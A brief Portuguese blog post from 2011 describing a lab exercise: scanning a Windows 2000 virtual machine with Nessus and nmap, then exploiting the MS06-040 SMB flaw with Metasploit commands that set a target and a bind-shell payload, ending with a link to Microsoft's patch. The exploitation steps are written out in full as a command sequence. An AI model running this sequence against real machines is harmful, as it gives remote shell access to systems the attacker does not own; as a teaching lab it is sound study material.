segunda-feira, 26 de setembro de 2011

Identificação e Exploração de vulnerabilidade - chutando cachorro morto

Cobaia: windows 2000 rodando no virtualbox

1) ligar windows 2000 e configurar rede (no meu caso 50.0.0.10)
2) com Nessus, fazer varredura na maquina win2000
3) identificar a vulnerabilidade ms06-040
4) Com nmap, identificar a porta 445 aberta (etapa não obrigatória)
nmap 50.0.0.10 -p 445
5) Metasploit
    $ msfconsole
    show exploits (identificar o ms06-040)
    use windows/smb/ms06_040_netapi
    set RHOST 50.0.0.10 (IP do alvo)
    set LHOST 50.0.0.2 (IP origem)
    show payloads (o que se deseja apos explorar vulnerabilidade)
    set PAYLOAD windows/shell/bind_tcp
exploit

Para consertar a vulnerabilidade, baixar o patch http://technet.microsoft.com/en-us/security/bulletin/ms06-040

Nenhum comentário:

Postar um comentário